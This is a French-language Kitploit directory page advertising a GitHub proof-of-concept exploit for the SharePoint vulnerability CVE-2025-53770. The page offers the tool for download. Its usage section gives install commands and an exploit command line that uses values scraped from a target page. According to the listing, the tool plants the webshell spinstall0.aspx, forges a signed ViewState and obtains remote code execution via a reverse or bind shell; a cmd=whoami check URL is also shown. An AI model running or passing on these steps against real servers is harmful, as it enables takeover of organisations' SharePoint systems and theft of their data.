Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Toolshell_CVE-2025-53770 — Exploit PoC pour CVE-2025-53770 permettant le téléchargement d'un webshell vers SharePoint, l'extraction de ValidationKey, la génération de ViewState signé et l'exécution de code à distance via un shell inverse ou lié. | Kitploit
Outils/GitHubGitHub/greenforcenetworks/toolshell_cve-2025-53770
Génération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed TeamingOutil d'Accès à Distance
GitHubgreenforcenetworks/toolshell_cve-2025-53770

Toolshell_CVE-2025-53770

Exploit PoC pour CVE-2025-53770 permettant le téléchargement d'un webshell vers SharePoint, l'extraction de ValidationKey, la génération de ViewState signé et l'exécution de code à distance via un shell inverse ou lié.

Voir le dépôt
4il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

ToolShell → PoC d'exploitation pour CVE‑2025‑53770

Ce package permet :

  1. Téléverser une webshell sur SharePoint
  2. Extraire la ValidationKey
  3. Générer un ViewState signé
  4. RCE via un reverse shell ou un bind shell

🔧 Installation

root@kitploit:~
git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt

🤖 Exécution

Téléversez la webshell

Depuis une page SharePoint, vous pouvez accéder au code source de la page. Allez simplement dans l'onglet view source et, si disponible, vous obtiendrez ce qui suit, que vous pouvez copier :

A) __VIEWSTATEGENERATOR

B) __EVENTVALIDATION

C) (un __VIEWSTATE actuel quelconque pour le contexte)

root@kitploit:~

python3 toolshell_exploit.py \
  --target https://sharepoint.local \
  --viewstate "<any_BASE64_VIEWSTATE>" \
  --generator "<VIEWSTATEGENERATOR>" \
  --eventval "<EVENTVALIDATION>"

Ceci téléverse spinstall0.aspx. Vérifiez : https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami

Télécharger l’outil